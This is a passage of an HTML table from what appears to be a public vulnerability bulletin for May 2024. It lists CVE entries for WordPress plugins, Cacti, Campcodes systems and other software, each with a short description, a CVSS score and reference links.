<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33950&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33950" target="_blank">CVE-2024-33950</a><br><a href="https://patchstack.com/database/vulnerability/archives-calendar-widget/wordpress-archives-calendar-widget-plugin-1-0-15-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>AlexaCRM--Dynamics 365 Integration<br> </td>
<td>Insertion of Sensitive Information into Log File vulnerability in AlexaCRM Dynamics 365 Integration.This issue affects Dynamics 365 Integration: from n/a through 1.3.17.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34550&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34550" target="_blank">CVE-2024-34550</a><br><a href="https://patchstack.com/database/vulnerability/integration-dynamics/wordpress-dynamics-365-integration-plugin-1-3-17-sensitive-data-exposure-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Andy Moyle--Church Admin<br> </td>
<td>Missing Authorization vulnerability in Andy Moyle Church Admin church-admin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Church Admin: from n/a through 4.1.6.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31281&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31281" target="_blank">CVE-2024-31281</a><br><a href="https://patchstack.com/database/vulnerability/church-admin/wordpress-church-admin-plugin-4-1-6-broken-access-control-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Andy Moyle--Church Admin<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in Andy Moyle Church Admin.This issue affects Church Admin: from n/a through 4.1.32.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34828&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34828" target="_blank">CVE-2024-34828</a><br><a href="https://patchstack.com/database/vulnerability/church-admin/wordpress-church-admin-plugin-4-1-32-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>AppPresser Team--AppPresser<br> </td>
<td>Missing Authorization vulnerability in AppPresser Team AppPresser.This issue affects AppPresser: from n/a through 4.3.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32776&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32776" target="_blank">CVE-2024-32776</a><br><a href="https://patchstack.com/database/vulnerability/apppresser/wordpress-apppresser-plugin-4-3-0-broken-access-control-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Artbees--SellKit<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Artbees SellKit allows Relative Path Traversal.This issue affects SellKit: from n/a through 1.8.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30509&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30509" target="_blank">CVE-2024-30509</a><br><a href="https://patchstack.com/database/vulnerability/sellkit/wordpress-sellkit-plugin-1-8-1-arbitrary-file-download-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Atanas Yonkov--Pliska<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Atanas Yonkov Pliska allows Stored XSS.This issue affects Pliska: from n/a through 0.3.5.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33954&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33954" target="_blank">CVE-2024-33954</a><br><a href="https://patchstack.com/database/vulnerability/pliska/wordpress-pliska-theme-0-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Automattic--WP Job Manager<br> </td>
<td>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Automattic WP Job Manager.This issue affects WP Job Manager: from n/a through 2.2.2.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34549&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34549" target="_blank">CVE-2024-34549</a><br><a href="https://patchstack.com/database/vulnerability/wp-job-manager/wordpress-wp-job-manager-plugin-2-2-2-sensitive-data-exposure-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>BdThemes--Ultimate Store Kit Elementor Addons<br> </td>
<td>Deserialization of Untrusted Data vulnerability in BdThemes Ultimate Store Kit Elementor Addons.This issue affects Ultimate Store Kit Elementor Addons: from n/a through 1.6.2.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4606&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4606" target="_blank">CVE-2024-4606</a><br><a href="https://patchstack.com/database/vulnerability/ultimate-store-kit/wordpress-ultimate-store-kit-elementor-addons-woocommerce-builder-edd-builder-plugin-1-6-2-php-object-injection-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Benoti--Brozzme Scroll Top<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Benoti Brozzme Scroll Top allows Stored XSS.This issue affects Brozzme Scroll Top: from n/a through 1.8.5.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34426&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34426" target="_blank">CVE-2024-34426</a><br><a href="https://patchstack.com/database/vulnerability/brozzme-scroll-top/wordpress-brozzme-scroll-top-plugin-1-8-5-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>BestWebSoft--Captcha by BestWebSoft<br> </td>
<td>Guessable CAPTCHA vulnerability in BestWebSoft Captcha by BestWebSoft allows Functionality Bypass.This issue affects Captcha by BestWebSoft: from n/a through 5.2.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31295&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31295" target="_blank">CVE-2024-31295</a><br><a href="https://patchstack.com/database/vulnerability/captcha-bws/wordpress-captcha-by-bestwebsoft-plugin-5-2-0-captcha-bypass-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>BetterAddons--Better Elementor Addons<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BetterAddons Better Elementor Addons better-elementor-addons allows Stored XSS.This issue affects Better Elementor Addons: from n/a through 1.4.4.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34432&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34432" target="_blank">CVE-2024-34432</a><br><a href="https://patchstack.com/database/vulnerability/better-elementor-addons/wordpress-better-elementor-addons-plugin-1-4-4-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Bootstrapped Ventures--Easy Affiliate Links<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bootstrapped Ventures Easy Affiliate Links allows Stored XSS.This issue affects Easy Affiliate Links: from n/a through 3.7.2.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34441&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34441" target="_blank">CVE-2024-34441</a><br><a href="https://patchstack.com/database/vulnerability/easy-affiliate-links/wordpress-easy-affiliate-links-plugin-3-7-2-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Brainstorm Force--Ultimate Addons for Beaver Builder<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Brainstorm Force Ultimate Addons for Beaver Builder allows Relative Path Traversal.This issue affects Ultimate Addons for Beaver Builder: from n/a through 1.35.13.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-51401&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-51401" target="_blank">CVE-2023-51401</a><br><a href="https://patchstack.com/database/vulnerability/bb-ultimate-addon/wordpress-ultimate-addons-for-beaver-builder-premium-plugin-1-35-13-limited-arbitrary-file-download-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Byzoro--Smart S200 Management Platform<br> </td>
<td>A vulnerability was found in Byzoro Smart S200 Management Platform up to 20240507. It has been rated as critical. This issue affects some unknown processing of the file /useratte/userattestation.php. The manipulation of the argument web_img leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264437 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4904&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4904" target="_blank">CVE-2024-4904</a><br><a href="https://github.com/Hefei-Coffee/cve/blob/main/upload.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264437" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264437" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.330636" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>CRM Perks--Integration for Contact Form 7 HubSpot<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in CRM Perks Integration for Contact Form 7 HubSpot.This issue affects Integration for Contact Form 7 HubSpot: from n/a through 1.3.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34756&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34756" target="_blank">CVE-2024-34756</a><br><a href="https://patchstack.com/database/vulnerability/cf7-hubspot/wordpress-integration-for-hubspot-and-contact-form-7-plugin-1-3-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>CRM Perks--Integration for Contact Form 7 and Salesforce<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in CRM Perks Integration for Contact Form 7 and Salesforce.This issue affects Integration for Contact Form 7 and Salesforce: from n/a through 1.3.9.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34755&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34755" target="_blank">CVE-2024-34755</a><br><a href="https://patchstack.com/database/vulnerability/cf7-salesforce/wordpress-integration-for-salesforce-and-contact-form-7-wpforms-elementor-formidable-ninja-forms-plugin-1-3-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>CRM Perks--Integration for Pipedrive and Contact Form 7, WPForms, Elementor, Ninja Forms<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in CRM Perks Integration for Pipedrive and Contact Form 7, WPForms, Elementor, Ninja Forms.This issue affects Integration for Pipedrive and Contact Form 7, WPForms, Elementor, Ninja Forms: from n/a through 1.2.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34817&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34817" target="_blank">CVE-2024-34817</a><br><a href="https://patchstack.com/database/vulnerability/integration-for-contact-form-7-and-pipedrive/wordpress-integration-for-pipedrive-and-contact-form-7-wpforms-elementor-ninja-forms-plugin-1-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Cacti--cacti<br> </td>
<td>Cacti provides an operational monitoring and fault management framework. A reflected cross-site scripting vulnerability on the 1.3.x DEV branch allows attackers to obtain cookies of administrator and other users and fake their login using obtained cookies. This issue is fixed in commit a38b9046e9772612fda847b46308f9391a49891e.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30268&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30268" target="_blank">CVE-2024-30268</a><br><a href="https://github.com/Cacti/cacti/blob/08497b8bcc6a6037f7b1aae303ad8f7dfaf7364e/settings.php#L66" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/Cacti/cacti/commit/a38b9046e9772612fda847b46308f9391a49891e" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-9m3v-whmr-pc2q" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Cacti--cacti<br> </td>
<td>Cacti provides an operational monitoring and fault management framework. Prior to version 1.2.27, some of the data stored in `automation_tree_rules.php` is not thoroughly checked and is used to concatenate the SQL statement in `create_all_header_nodes()` function from `lib/api_automation.php` , finally resulting in SQL injection. Using SQL based secondary injection technology, attackers can modify the contents of the Cacti database, and based on the modified content, it may be possible to achieve further impact, such as arbitrary file reading, and even remote code execution through arbitrary file writing. Version 1.2.27 contains a patch for the issue.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31460&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31460" target="_blank">CVE-2024-31460</a><br><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-cx8g-hvq8-p2rv" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-gj3f-p326-gh8r" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Cacti--cacti<br> </td>
<td>Cacti provides an operational monitoring and fault management framework. Versions of Cacti prior to 1.2.27 contain a residual cross-site scripting vulnerability caused by an incomplete fix for CVE-2023-50250. `raise_message_javascript` from `lib/functions.php` now uses purify.js to fix CVE-2023-50250 (among others). However, it still generates the code out of unescaped PHP variables `$title` and `$header`. If those variables contain single quotes, they can be used to inject JavaScript code. An attacker exploiting this vulnerability could execute actions on behalf of other users. This ability to impersonate users could lead to unauthorized changes to settings. Version 1.2.27 fixes this issue.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-29894&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29894" target="_blank">CVE-2024-29894</a><br><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-grj5-8fcj-34gh" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-xwqc-7jc4-xm73" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Cacti--cacti<br> </td>
<td>Cacti provides an operational monitoring and fault management framework. Prior to 1.2.27, some of the data stored in `form_save()` function in `data_queries.php` is not thoroughly checked and is used to concatenate the HTML statement in `grow_right_pane_tree()` function from `lib/html.php` , finally resulting in cross-site scripting. Version 1.2.27 contains a patch for the issue.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31443&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">5.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31443" target="_blank">CVE-2024-31443</a><br><a href="https://github.com/Cacti/cacti/commit/f946fa537d19678f938ddbd784a10e3290d275cf" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-rqc8-78cm-85j3" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Cacti--cacti<br> </td>
<td>Cacti provides an operational monitoring and fault management framework. Prior to version 1.2.27, some of the data stored in `automation_tree_rules_form_save()` function in `automation_tree_rules.php` is not thoroughly checked and is used to concatenate the HTML statement in `form_confirm()` function from `lib/html.php` , finally resulting in cross-site scripting. Version 1.2.27 contains a patch for the issue.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31444&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L" target="_blank" title="CVSS V3 Score">4.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31444" target="_blank">CVE-2024-31444</a><br><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-p4ch-7hjw-6m87" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Cacti--cacti<br> </td>
<td>Cacti provides an operational monitoring and fault management framework. Prior to version 1.2.27, some of the data stored in `form_save()` function in `graph_template_inputs.php` is not thoroughly checked and is used to concatenate the SQL statement in `draw_nontemplated_fields_graph_item()` function from `lib/html_form_templates.php` , finally resulting in SQL injection. Version 1.2.27 contains a patch for the issue.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31458&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L" target="_blank" title="CVSS V3 Score">4.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31458" target="_blank">CVE-2024-31458</a><br><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-jrxg-8wh8-943x" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability, which was classified as critical, was found in Campcodes Complete Web-Based School Management System 1.0. This affects an unknown part of the file /view/show_student1.php. The manipulation of the argument grade leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264441 was assigned to this vulnerability.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4906&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4906" target="_blank">CVE-2024-4906</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20sql/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%202.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264441" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264441" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333292" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability has been found in Campcodes Complete Web-Based School Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /view/show_student2.php. The manipulation of the argument grade leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-264442 is the identifier assigned to this vulnerability.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4907&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4907" target="_blank">CVE-2024-4907</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20sql/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%203.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264442" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264442" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333293" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /view/student_attendance_history1.php. The manipulation of the argument index leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264443.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4908&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4908" target="_blank">CVE-2024-4908</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20sql/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%204.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264443" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264443" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333294" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /view/student_due_payment.php. The manipulation of the argument due_year leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264444.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4909&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4909" target="_blank">CVE-2024-4909</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20sql/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%205.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264444" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264444" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333295" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /view/student_exam_mark_insert_form1.php. The manipulation of the argument grade leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264445 was assigned to this vulnerability.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4910&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4910" target="_blank">CVE-2024-4910</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20sql/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%206.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264445" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264445" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333296" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /view/student_exam_mark_update_form.php. The manipulation of the argument exam leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-264446 is the identifier assigned to this vulnerability.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4911&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4911" target="_blank">CVE-2024-4911</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20sql/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%207.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264446" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264446" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333297" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Legal Case Management System<br> </td>
<td>A vulnerability, which was classified as critical, was found in Campcodes Legal Case Management System 1.0. Affected is an unknown function of the file /admin/general-setting of the component Setting Handler. The manipulation of the argument favicon/logo leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-263622 is the identifier assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4681&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">4.7</a></td>
